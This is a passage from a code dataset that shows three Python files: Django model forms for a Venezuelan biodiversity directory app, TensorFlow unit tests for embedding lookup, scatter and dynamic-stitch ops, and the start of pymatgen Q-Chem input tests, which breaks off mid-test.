code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
# -*- coding: UTF-8 -*-
from django import forms
from models import *
import re
from django.utils.translation import ugettext, ugettext_lazy as _
class MiembrosInstForm(forms.ModelForm):
class Meta:
model = MiembrosdeInstituciones
fields = ('institucion','miembros','estatu')
class RedactarForm(forms.ModelForm):
class Meta:
model = SistemaMensajeria
fields = ('remi','destino','asunto','mensaje','estatu')
class OrganizacionesForm(forms.ModelForm):
class Meta:
model = Actores
fields = ('tiposAreasAccion','actoresrex','bancoaudio','horarios','fund','url','ambitoaccion','principalesorgfinan','objetivos','publicacionesPeriodicas','aniofundacion','telefono','fax','address','geolocation','rif','siglas','nombre','nombre_completo','direccion','pai','estado','municipio','parroquia','correo','reseniahistorica','pubp','grupobio','logotipo','categoriact','tipocolec','particularidades','estrOrganz','actinteres','coord','estrucorg','tipoorganizacion','userupdate','areasesconserv','directorio','estatu')
class PersonasForm(forms.ModelForm):
class Meta:
model = Directorios
fields = ('documentoidentidad','nombre','apellido','correo','telefono1','telefono2','movil','fax','pai','estado',
'municipio','parroquia','sector','gruposespecie','areasaccion')
class FormularioActualizarDatos1(forms.ModelForm):
class Meta:
model = Directorios
fields = ('nombre','apellido','nacimiento','sexo','pai','estado','municipio','parroquia')
class UserCreationFormSVIDB(forms.ModelForm):
"""
A form that creates a user, with no privileges, from the given username and
password.
"""
error_messages = {
'duplicate_username': _("A user with that username already exists."),
'password_mismatch': _("The two password fields didn't match."),
}
username = forms.RegexField(label=_("Username"), max_length=255,
regex=r'^[\w.@+-]+$',
help_text = _("Required. 255 characters or fewer. Letters, digits and "
"@/./+/-/_ only."),
error_messages = {
'invalid': _("This value may contain only letters, numbers and "
"@/./+/-/_ characters.")})
password1_confirmation = forms.CharField(label=_("Password"),
widget=forms.PasswordInput)
password1 = forms.CharField(label=_("Password confirmation"),
widget=forms.PasswordInput,
help_text = _("Enter the same password as above, for verification."))
class Meta:
model = User
fields = ("username",)
def clean_username(self):
# Since User.username is unique, this check is redundant,
# but it sets a nicer error message than the ORM. See #13147.
username = self.cleaned_data["username"]
try:
User.objects.get(username=username)
except User.DoesNotExist:
return username
raise forms.ValidationError(self.error_messages['duplicate_username'])
def clean_password1(self):
password1_confirmation = self.cleaned_data.get("password1_confirmation", "")
password1 = self.cleaned_data["password1"]
if password1_confirmation != password1:
raise forms.ValidationError(
self.error_messages['password_mismatch'])
return password1
def save(self, commit=True):
user = super(UserCreationFormSVIDB, self).save(commit=False)
user.set_password(self.cleaned_data["password1_confirmation"])
if commit:
user.save()
return user
class PersonasRegForm(forms.ModelForm):
class Meta:
model = Directorios
fields = ('tipodoci','documentoidentidad','nombre','apellido')
class FormularioPersonaEventos(forms.ModelForm):
class Meta:
model = Directorios
fields = ('tipodoci','documentoidentidad','nombre','apellido','sexo','nacimiento','pai','estado',
'municipio','parroquia')
class PersonasEditForm(forms.ModelForm):
class Meta:
model = Directorios
fields = ('id','nombre','apellido','sexo','edocivil','nacimiento','correo','telefono1','telefono2','movil','fax','pai','estado',
'municipio','parroquia','sector','gruposespecie','areasaccion')
class PersonasEditFormNew(forms.ModelForm):
class Meta:
model = Directorios
fields = ('tipodoci','documentoidentidad','nombre','apellido','sexo','edocivil','nacimiento','correo','telefono1','telefono2','movil','fax','pai','estado',
'municipio','parroquia','sector','gruposespecie','areasaccion')
class PersonasEditForm2(forms.ModelForm):
class Meta:
model = Directorios
fields = ('id','nombre','apellido','sexo','nacimiento','correo','telefono1','telefono2','movil','fax','pai','estado',
'municipio','parroquia','sector','gruposespecie','areasaccion')
class coautorform(forms.ModelForm):
class Meta:
model = Directorios
fields = ('tipodoci','documentoidentidad','nombre','apellido','movil')
class InstitucionesForm(forms.ModelForm):
class Meta:
model = Actores
fields = ('tipoorganizacion','nombre_completo','telefono','fax','siglas','correo','pai','estado','direccion',
'rif','ambitoaccion')
class AgregarBibliotecaPublic(forms.ModelForm):
class Meta:
model = Bibliotecas
fields = ('titulo','fecha','autores','directorio','editorial','ibsn','edicion','numerovolumen','resumen','observaciones',
'tipodocs','userupdate','estatu','idioma','numeropaginas','repositoriolinea','licencia')
class AgregarBancoaudiovisualsPublic(forms.ModelForm):
class Meta:
model = Bancoaudiovisuals
fields = ('directorio','fecha','lugar','descripcion','tipo','pathimg','licencia','observaciones','userupdate','estatu',
'seccion')
| desarrollosimagos/svidb | administrativo/actores/forms.py | Python | gpl-3.0 | 6,041 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for ops used with embeddings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
def _AsLong(array):
"""Casts arrays elements to long type. Used to convert from numpy tf."""
return [int(x) for x in array]
class ScatterAddSubTest(tf.test.TestCase):
def _TestCase(self, shape, indices, scatter_op=tf.scatter_add):
"""Run a random test case with the given shape and indices.
Args:
shape: Shape of the parameters array.
indices: One-dimensional array of ints, the indices of the last dimension
of the parameters to update.
scatter_op: ScatterAdd or ScatterSub.
"""
super(ScatterAddSubTest, self).setUp()
with self.test_session(use_gpu=False):
# Create a random parameter array of given shape
p_init = np.random.rand(*shape).astype("f")
# Create the shape of the update array. All dimensions except the last
# match the parameter array, the last dimension equals the # of indices.
vals_shape = [len(indices)] + shape[1:]
vals_init = np.random.rand(*vals_shape).astype("f")
v_i = [float(x) for x in vals_init.ravel()]
p = tf.Variable(p_init)
vals = tf.constant(v_i, shape=vals_shape, name="vals")
ind = tf.constant(indices, dtype=tf.int32)
p2 = scatter_op(p, ind, vals, name="updated_p")
# p = init
tf.global_variables_initializer().run()
# p += vals
result = p2.eval()
# Compute the expected 'p' using numpy operations.
for i, ind in enumerate(indices):
if scatter_op == tf.scatter_add:
p_init.reshape(shape[0], -1)[ind, :] += (
vals_init.reshape(vals_shape[0], -1)[i, :])
else:
p_init.reshape(shape[0], -1)[ind, :] -= (
vals_init.reshape(vals_shape[0], -1)[i, :])
self.assertTrue(all((p_init == result).ravel()))
def testNoRepetitions(self):
self._TestCase([2, 2], [1])
self._TestCase([4, 4, 4], [2, 0])
self._TestCase([43, 20, 10, 10], [42, 5, 6, 1, 3, 5, 7, 9])
def testWithRepetitions(self):
self._TestCase([2, 2], [1, 1])
self._TestCase([5, 3, 9, 5], [2, 0, 4, 1, 3, 1, 4, 0, 4, 3])
self._TestCase([32, 4, 4], [31] * 8)
def testRandom(self):
# Random shapes of rank 4, random indices
for _ in range(5):
shape = np.random.randint(1, 20, size=4)
indices = np.random.randint(shape[0], size=2 * shape[0])
self._TestCase(_AsLong(list(shape)), list(indices))
def testSubRandom(self):
# Random shapes of rank 4, random indices
for _ in range(5):
shape = np.random.randint(1, 20, size=4)
indices = np.random.randint(shape[0], size=2 * shape[0])
self._TestCase(_AsLong(list(shape)), list(indices),
tf.scatter_sub)
def testWrongShape(self):
# Indices and values mismatch.
var = tf.Variable(tf.zeros(shape=[1024, 64, 64], dtype=tf.float32))
indices = tf.placeholder(tf.int32, shape=[32])
values = tf.placeholder(tf.float32, shape=[33, 64, 64])
with self.assertRaises(ValueError):
tf.scatter_add(var, indices, values)
# Var and values mismatch.
values = tf.placeholder(tf.float32, shape=[32, 64, 63])
with self.assertRaises(ValueError):
tf.scatter_add(var, indices, values)
def _PName(param_id):
return "p" + str(param_id)
def _EmbeddingParams(num_shards, vocab_size,
dtype=tf.float32,
shape=None,
use_shapeless_placeholder=False):
p = []
params = {}
feed_dict = {}
if not shape: shape = [10]
for i in range(num_shards):
shard_shape = [vocab_size // num_shards] + shape
if i < vocab_size % num_shards: # Excess goes evenly on the first shards
shard_shape[0] += 1
param_name = _PName(i)
if use_shapeless_placeholder:
param = tf.placeholder(dtype, shape=None, name=param_name)
else:
param = tf.constant(1.0, shape=shard_shape, dtype=dtype, name=param_name)
p.append(param)
np_type = "f" if dtype == tf.float32 else "d"
val = (np.random.rand(*shard_shape).astype(np_type)) + 1
params[param_name + ":0"] = val
feed_dict[param.name] = val
return p, params, feed_dict
def _EmbeddingParamsAsPartitionedVariable(num_shards, vocab_size,
dtype=tf.float32, shape=None):
p, params, feed_dict = _EmbeddingParams(
num_shards, vocab_size, dtype=dtype, shape=shape)
shape = shape or [10]
partitioned_variable = tf.get_variable(
"p",
shape=[vocab_size] + shape,
initializer=tf.concat(0, [params[p_i.name] for p_i in p]),
partitioner=tf.min_max_variable_partitioner(
max_partitions=num_shards, min_slice_size=1))
return p, partitioned_variable, params, feed_dict
def _EmbeddingResult(params, id_vals, num_shards, vocab_size,
partition_strategy="mod",
weight_vals=None):
if weight_vals is None:
weight_vals = np.copy(id_vals)
weight_vals.fill(1)
values = []
weights = []
weights_squared = []
for ids, wts in zip(id_vals, weight_vals):
value_aggregation = None
weight_aggregation = None
squared_weight_aggregation = None
if isinstance(ids, tf.compat.integral_types):
ids = [ids]
wts = [wts]
for i, weight_value in zip(ids, wts):
if partition_strategy == "mod":
val = np.copy(params[_PName(i % num_shards) + ":0"][
i // num_shards, :]) * weight_value
elif partition_strategy == "div":
ids_per_partition, extras = divmod(vocab_size, num_shards)
threshold = extras * (ids_per_partition + 1)
if i < threshold:
partition = i // (ids_per_partition + 1)
offset = i % (ids_per_partition + 1)
else:
partition = extras + (i - threshold) // ids_per_partition
offset = (i - threshold) % ids_per_partition
val = np.copy(
params[_PName(partition) + ":0"][offset, :]) * weight_value
else:
assert False
if value_aggregation is None:
assert weight_aggregation is None
assert squared_weight_aggregation is None
value_aggregation = val
weight_aggregation = weight_value
squared_weight_aggregation = weight_value * weight_value
else:
assert weight_aggregation is not None
assert squared_weight_aggregation is not None
value_aggregation += val
weight_aggregation += weight_value
squared_weight_aggregation += weight_value * weight_value
values.append(value_aggregation)
weights.append(weight_aggregation)
weights_squared.append(squared_weight_aggregation)
values = np.array(values).astype(np.float32)
weights = np.array(weights).astype(np.float32)
weights_squared = np.array(weights_squared).astype(np.float32)
return values, weights, weights_squared
class EmbeddingLookupTest(tf.test.TestCase):
# This test looks up [0, 0] in a parameter matrix sharded 2 ways. Since
# both the ids are in the first shard, one of the resulting lookup
# vector is going to be empty. The subsequent DivOp fails because of that.
# TODO(keveman): Disabling the test until the underlying problem is fixed.
def testSimpleSharded(self):
with self.test_session():
num_shards = 2
vocab_size = 4
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
id_vals = np.array([0, 0])
ids = tf.constant(list(id_vals), dtype=tf.int32)
print("Construct ids", ids.get_shape())
embedding = tf.nn.embedding_lookup(p, ids)
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testMaxNorm(self):
with self.test_session():
embeddings = tf.constant([[2.0]])
ids = tf.constant([0], dtype=tf.int32)
embedding = tf.nn.embedding_lookup([embeddings], ids, max_norm=1.0)
self.assertAllEqual(embedding.eval(), [[1.0]])
def testMaxNormNontrivial(self):
with self.test_session():
embeddings = tf.constant([[2.0, 4.0], [3.0, 1.0]])
ids = tf.constant([0, 1], dtype=tf.int32)
embedding = tf.nn.embedding_lookup([embeddings], ids, max_norm=2.0)
norms = tf.sqrt(tf.reduce_sum(embeddings * embeddings, axis=1))
normalized = embeddings/tf.stack([norms, norms], axis=1)
self.assertAllEqual(embedding.eval(), 2 * normalized.eval())
def testSimpleShardedPartitionedVariable(self):
with self.test_session() as sess:
num_shards = 2
vocab_size = 4
p, p_variable, params, feed_dict = _EmbeddingParamsAsPartitionedVariable(
num_shards, vocab_size)
id_vals = np.array([0, 0])
ids = tf.constant(list(id_vals), dtype=tf.int32)
print("Construct ids", ids.get_shape())
embedding = tf.nn.embedding_lookup(p_variable, ids)
tf.global_variables_initializer().run()
params_values = [params[p_i.name] for p_i in p]
# Test that the PartitionedVariable components equal the list in p
p_var_val = sess.run(list(p_variable))
# Actual test
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(params_values, p_var_val)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedModPartitioningInt32Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int32)
embedding = tf.nn.embedding_lookup(p, ids)
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedModPartitioningInt64Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int64)
embedding = tf.nn.embedding_lookup(p, ids)
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(params, id_vals, num_shards, vocab_size)
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningInt32Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int32)
embedding = tf.nn.embedding_lookup(p, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningInt32IdsPartitionedVariable(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
_, p_variable, params, feed_dict = _EmbeddingParamsAsPartitionedVariable(
num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int32)
tf.global_variables_initializer().run()
embedding = tf.nn.embedding_lookup(
p_variable, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningInt64Ids(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int64)
embedding = tf.nn.embedding_lookup(p, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
self.assertShapeEqual(np_result, embedding)
def testShardedDivPartitioningUnknownParamShape(self):
with self.test_session():
num_shards = 5
vocab_size = 13
# Embedding dimensions is 10. The vocab_size x 10 embedding
# parameters are spread in num_shards matrices, so the first
# 3 shards are 3 x 10 and the last 2 shards are 2 x 10.
# We clear parameter shapes, to test when shape is not statically known.
p, params, feed_dict = _EmbeddingParams(
num_shards, vocab_size, use_shapeless_placeholder=True)
num_vals = 30
# Fetch num_vals embeddings for random word ids. Since
# num_vals > vocab_size, this ought to have repetitions, so
# will test that aspect.
id_vals = np.random.randint(vocab_size, size=num_vals)
ids = tf.constant(list(id_vals), dtype=tf.int64)
embedding = tf.nn.embedding_lookup(p, ids, partition_strategy="div")
tf_result = embedding.eval(feed_dict=feed_dict)
np_result, _, _ = _EmbeddingResult(
params, id_vals, num_shards, vocab_size, partition_strategy="div")
self.assertAllEqual(np_result, tf_result)
def testGradientsEmbeddingLookup(self):
vocab_size = 9
num_ids = 10
id_vals = list(np.random.randint(vocab_size, size=num_ids))
tf.logging.vlog(1, id_vals)
for ids_shape in [(10,), (2, 5)]:
for num_shards in [1, 3]:
with self.test_session():
ids = tf.constant(id_vals, shape=ids_shape, dtype=tf.int32)
x, params, _ = _EmbeddingParams(
num_shards, vocab_size, shape=[2])
y = tf.nn.embedding_lookup(x, ids)
y_shape = [num_ids] + list(params[_PName(0) + ":0"].shape[1:])
x_name = [_PName(i) for i in range(num_shards)]
x_init_value = [params[x_n + ":0"] for x_n in x_name]
x_shape = [i.shape for i in x_init_value]
err = tf.test.compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=x_init_value)
self.assertLess(err, 1e-4)
def testGradientsEmbeddingLookupWithComputedParams(self):
vocab_size = 9
num_ids = 5
id_vals = list(np.random.randint(vocab_size, size=num_ids))
tf.logging.vlog(1, id_vals)
for num_shards in [1, 3]:
with self.test_session():
ids = tf.constant(id_vals, dtype=tf.int32)
x, params, _ = _EmbeddingParams(
num_shards, vocab_size, shape=[2])
# This will force a conversion from IndexedSlices to Tensor.
x_squared = [tf.square(elem) for elem in x]
y = tf.nn.embedding_lookup(x_squared, ids)
y_shape = [num_ids] + list(params[_PName(0) + ":0"].shape[1:])
x_name = [_PName(i) for i in range(num_shards)]
x_init_value = [params[x_n + ":0"] for x_n in x_name]
x_shape = [i.shape for i in x_init_value]
err = tf.test.compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=x_init_value)
self.assertLess(err, 1e-3)
def testConstructionNonSharded(self):
with tf.Graph().as_default():
p = tf.Variable(tf.zeros(shape=[100, 100], dtype=tf.float32))
ids = tf.constant([0, 1, 1, 7], dtype=tf.int32)
tf.nn.embedding_lookup([p], ids)
def testConstructionSharded(self):
with tf.Graph().as_default():
p = []
for _ in range(2):
p += [tf.Variable(tf.zeros(shape=[100, 100], dtype=tf.float32))]
ids = tf.constant([0, 1, 1, 17], dtype=tf.int32)
tf.nn.embedding_lookup(p, ids)
def testHigherRank(self):
np.random.seed(8)
with self.test_session():
for params_shape in (12,), (6, 3):
params = np.random.randn(*params_shape)
for ids_shape in (3, 2), (4, 3):
ids = np.random.randint(params.shape[0],
size=np.prod(ids_shape)).reshape(ids_shape)
# Compare nonsharded to gather
simple = tf.nn.embedding_lookup(params, ids).eval()
self.assertAllEqual(simple, tf.gather(params, ids).eval())
# Run a few random sharded versions
for procs in 1, 2, 3:
stride = procs * tf.range(params.shape[0] // procs)
split_params = [tf.gather(params, stride + p)
for p in xrange(procs)]
sharded = tf.nn.embedding_lookup(split_params, ids).eval()
self.assertAllEqual(simple, sharded)
class EmbeddingLookupSparseTest(tf.test.TestCase):
def _RandomIdsAndWeights(self, batch_size, vocab_size):
max_val_per_entry = 6
vals_per_batch_entry = np.random.randint(
1, max_val_per_entry, size=batch_size)
num_vals = np.sum(vals_per_batch_entry)
ids = np.random.randint(vocab_size, size=num_vals)
weights = 1 + np.random.rand(num_vals)
indices = []
for batch_entry, num_val in enumerate(vals_per_batch_entry):
for val_index in range(num_val):
indices.append([batch_entry, val_index])
shape = [batch_size, max_val_per_entry]
sp_ids = tf.SparseTensor(
tf.constant(indices, tf.int64),
tf.constant(ids, tf.int32),
tf.constant(shape, tf.int64))
sp_weights = tf.SparseTensor(
tf.constant(indices, tf.int64),
tf.constant(weights, tf.float32),
tf.constant(shape, tf.int64))
return sp_ids, sp_weights, ids, weights, vals_per_batch_entry
def _GroupByBatchEntry(self, vals, vals_per_batch_entry):
grouped_vals = []
index = 0
for num_val in vals_per_batch_entry:
grouped_vals.append(list(vals[index: (index + num_val)]))
index += num_val
return grouped_vals
def testEmbeddingLookupSparse(self):
vocab_size = 13
batch_size = 10
param_shape = [2, 5]
expected_lookup_result_shape = [None] + param_shape
sp_ids, sp_weights, ids, weights, vals_per_batch_entry = (
self._RandomIdsAndWeights(batch_size, vocab_size))
grouped_ids = self._GroupByBatchEntry(ids, vals_per_batch_entry)
grouped_weights = self._GroupByBatchEntry(weights, vals_per_batch_entry)
grouped_ignored_weights = self._GroupByBatchEntry(
np.ones(np.sum(vals_per_batch_entry)), vals_per_batch_entry)
for num_shards, combiner, dtype, ignore_weights in itertools.product(
[1, 5],
["sum", "mean", "sqrtn"],
[tf.float32, tf.float64],
[True, False]):
with self.test_session():
p, params, feed_dict = _EmbeddingParams(num_shards, vocab_size,
shape=param_shape,
dtype=dtype)
embedding_sum = tf.nn.embedding_lookup_sparse(
p, sp_ids, None if ignore_weights else sp_weights,
combiner=combiner)
self.assertEqual(embedding_sum.get_shape().as_list(),
expected_lookup_result_shape)
tf_embedding_sum = embedding_sum.eval(feed_dict=feed_dict)
np_embedding_sum, np_weight_sum, np_weight_sq_sum = _EmbeddingResult(
params, grouped_ids, num_shards, vocab_size,
weight_vals=grouped_ignored_weights
if ignore_weights else grouped_weights)
if combiner == "mean":
np_embedding_sum /= np.reshape(np_weight_sum, (batch_size, 1, 1))
if combiner == "sqrtn":
np_embedding_sum /= np.reshape(
np.sqrt(np_weight_sq_sum), (batch_size, 1, 1))
self.assertAllClose(np_embedding_sum, tf_embedding_sum)
def testGradientsEmbeddingLookupSparse(self):
vocab_size = 12
batch_size = 4
param_shape = [2, 3]
sp_ids, sp_weights, _, _, _ = (
self._RandomIdsAndWeights(batch_size, vocab_size))
for num_shards, combiner, dtype, ignore_weights in itertools.product(
[1, 3],
["sum", "mean", "sqrtn"],
[tf.float32, tf.float64],
[True, False]):
with self.test_session():
x, params, _ = _EmbeddingParams(num_shards, vocab_size,
shape=param_shape,
dtype=dtype)
y = tf.nn.embedding_lookup_sparse(
x, sp_ids, None if ignore_weights else sp_weights,
combiner=combiner)
x_name = [_PName(i) for i in range(num_shards)]
x_init_value = [params[x_n + ":0"] for x_n in x_name]
x_shape = [i.shape for i in x_init_value]
y_shape = [batch_size] + list(params[_PName(0) + ":0"].shape[1:])
err = tf.test.compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=x_init_value)
self.assertLess(err, 1e-5 if dtype == tf.float64 else 2e-3)
def testIncompatibleShapes(self):
with self.test_session():
x, _, _ = _EmbeddingParams(1, 10, dtype=tf.float32)
sp_ids = tf.SparseTensor(
tf.constant([[0, 0], [0, 1], [1, 0]], tf.int64),
tf.constant([0, 1, 2], tf.int32),
tf.constant([2, 2], tf.int64))
sp_weights = tf.SparseTensor(
tf.constant([[0, 0], [0, 1]], tf.int64),
tf.constant([12.0, 5.0], tf.float32),
tf.constant([1, 2], tf.int64))
with self.assertRaises(ValueError):
tf.nn.embedding_lookup_sparse(x, sp_ids, sp_weights, combiner="mean")
class DynamicStitchOpTest(tf.test.TestCase):
def testCint32Cpu(self):
with self.test_session(use_gpu=False):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testCint32Gpu(self):
with self.test_session(use_gpu=True):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testInt32Cpu(self):
with self.test_session(use_gpu=False):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testInt32Gpu(self):
with self.test_session(use_gpu=True):
indices = [tf.convert_to_tensor([0, 1, 2]), tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([12, 23, 34]), tf.convert_to_tensor([1, 2])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [12, 23, 1, 2])
def testSumGradArgs(self):
with self.test_session(use_gpu=False):
indices = [tf.convert_to_tensor([0, 1, 2, 3]),
tf.convert_to_tensor([2, 3])]
values = [tf.convert_to_tensor([2, 3, 5, 7]), tf.convert_to_tensor([1, 1])]
self.assertAllEqual(
tf.dynamic_stitch(indices, values).eval(), [2, 3, 1, 1])
# We expect that the values are merged in order.
def testStitchOrder(self):
with self.test_session():
indices = []
np_values = []
values = []
for _ in range(10):
indices.extend([tf.convert_to_tensor(np.arange(100).astype(np.int32))])
np_values.extend([np.random.uniform(size=100)])
values.extend([tf.convert_to_tensor(np_values[-1])])
stitched = tf.dynamic_stitch(indices, values).eval()
self.assertAllEqual(np_values[-1], stitched)
if __name__ == "__main__":
tf.test.main()
| DCSaunders/tensorflow | tensorflow/python/kernel_tests/embedding_ops_test.py | Python | apache-2.0 | 27,359 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import copy
import glob
import json
import os
import unittest
from pymatgen import Molecule
from pymatgen.io.qchem import QcTask, QcInput, QcOutput
from pymatgen.util.testing import PymatgenTest
__author__ = 'xiaohuiqu'
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..",
'test_files', "molecules")
coords = [[0.000000, 0.000000, 0.000000],
[0.000000, 0.000000, 1.089000],
[1.026719, 0.000000, -0.363000],
[-0.513360, -0.889165, -0.363000],
[-0.513360, 0.889165, -0.363000]]
mol = Molecule(["C", "H", "H", "H", "Cl"], coords)
coords2 = [[0.0, 0.0, -2.4],
[0.0, 0.0, 0.0],
[0.0, 0.0, 2.4]]
heavy_mol = Molecule(["Br", "Cd", "Br"], coords2)
coords3 = [[2.632273, -0.313504, -0.750376],
[3.268182, -0.937310, -0.431464],
[2.184198, -0.753305, -1.469059]]
water_mol = Molecule(["O", "H", "H"], coords3)
class QcTaskTest(PymatgenTest):
def elementary_io_verify(self, text, qctask):
self.to_and_from_dict_verify(qctask)
self.from_string_verify(contents=text, ref_dict=qctask.as_dict())
def to_and_from_dict_verify(self, qctask):
"""
Helper function. This function should be called in each specific test.
"""
d1 = qctask.as_dict()
qc2 = QcTask.from_dict(d1)
d2 = qc2.as_dict()
self.assertEqual(d1, d2)
def from_string_verify(self, contents, ref_dict):
qctask = QcTask.from_string(contents)
d2 = qctask.as_dict()
self.assertEqual(ref_dict, d2)
def test_read_zmatrix(self):
contents = '''$moLEcule
1 2
S
C 1 1.726563
H 2 1.085845 1 119.580615
C 2 1.423404 1 114.230851 3 -180.000000 0
H 4 1.084884 2 122.286346 1 -180.000000 0
C 4 1.381259 2 112.717365 1 0.000000 0
H 6 1.084731 4 127.143779 2 -180.000000 0
C 6 1.415867 4 110.076147 2 0.000000 0
F 8 1.292591 6 124.884374 4 -180.000000 0
$end
$reM
BASIS = 6-31+G*
EXCHANGE = B3LYP
jobtype = freq
$end
'''
qctask = QcTask.from_string(contents)
ans = '''$molecule
1 2
S 0.00000000 0.00000000 0.00000000
C 0.00000000 0.00000000 1.72656300
H -0.94431813 0.00000000 2.26258784
C 1.29800105 -0.00000002 2.31074808
H 1.45002821 -0.00000002 3.38492732
C 2.30733813 -0.00000003 1.36781908
H 3.37622632 -0.00000005 1.55253338
C 1.75466906 -0.00000003 0.06427152
F 2.44231414 -0.00000004 -1.03023099
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31+g*
$end
'''
ans_tokens = ans.split('\n')
ans_text_part = ans_tokens[:2] + ans_tokens[11:]
ans_coords_part = ans_tokens[2:11]
converted_tokens = str(qctask).split('\n')
converted_text_part = converted_tokens[:2] + converted_tokens[11:]
converted_coords_part = converted_tokens[2:11]
self.assertEqual(ans_text_part, converted_text_part)
for ans_coords, converted_coords in zip(ans_coords_part,
converted_coords_part):
ans_coords_tokens = ans_coords.split()
converted_coords_tokens = converted_coords.split()
self.assertEqual(ans_coords_tokens[0], converted_coords_tokens[0])
xyz1 = ans_coords_tokens[1:]
